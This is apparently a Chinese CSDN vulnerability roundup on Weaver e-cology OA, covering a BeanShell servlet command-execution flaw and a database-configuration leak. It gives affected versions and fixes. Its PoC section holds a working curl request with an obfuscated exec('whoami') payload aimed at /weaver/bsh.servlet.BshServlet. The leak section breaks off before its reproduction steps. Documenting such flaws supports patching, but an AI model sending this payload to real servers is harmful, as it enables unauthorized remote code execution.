url存在链接注入漏洞_泛微OA 漏洞汇总

本文详细分析了泛微协同商务软件存在的命令执行和数据库泄露漏洞,包括漏洞描述、影响范围、复现步骤及修复方案。攻击者可利用这些漏洞获取服务器权限、执行远程代码以及非法获取数据库配置信息。
摘要由CSDN通过智能技术生成

e9eb29ec3b7ab3e1ddc2600a39c5e40c.gif

0x01 漏洞描述

泛微协同商务软件系统存在命令执行漏洞,攻击者可利用该漏洞获取服务器权限。

0x02 漏洞危害

攻击者可以通过精心构造的请求包在受影响版本的泛微OA上进行远程代码执行。

0x03 影响范围

泛微 e-cology<=9.0

0x04 漏洞复现

访问 http://url/weaver/bsh.servlet.BshServlet 输入 payload 如下:

5c6628a3ca3306fcb53f0759c4bb0311.png

18f92f1ec83b607d3a8a95bf3194c9bc.png

36313581093e443547e679ae910a2fe0.png

0x05 poc

漏洞路径:/weaver/bsh.servlet.BshServlet

exec("whoami")

curl http://xx.xx.xx.xx.xx/weaver/bsh.servlet.BshServlet/ -d 'bsh.script=ev

al%00("ex"%2b"ec(\"whoami\")");&bsh.servlet.captureOutErr=true&bsh.servlet.outp ut=raw'

0x06修复方案

1、屏蔽/weaver/*目录的访问;

2、https://www.weaver.com.cn/cs/securityDownload.asp

泛微OA系统在数据库配置信息泄露

0x01 漏洞描述

攻击者可通过该漏洞页面直接获取到数据库配置信息,攻击者可通过访问存在漏洞的页面并解密从而获取数据库配置信息,如攻击者可直接访问数据库,则可直接获取用户数据,由于泛微e-cology默认数据库大多为MSSQL数据库,结合XPCMDSHELL将可直接控制数据库服务器.

0x02 影响范围

目前已知为8.100.0531,不排除其他版本,包括不限于EC7.0、EC8.0、EC9.0版

0x03漏洞复现

 对

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值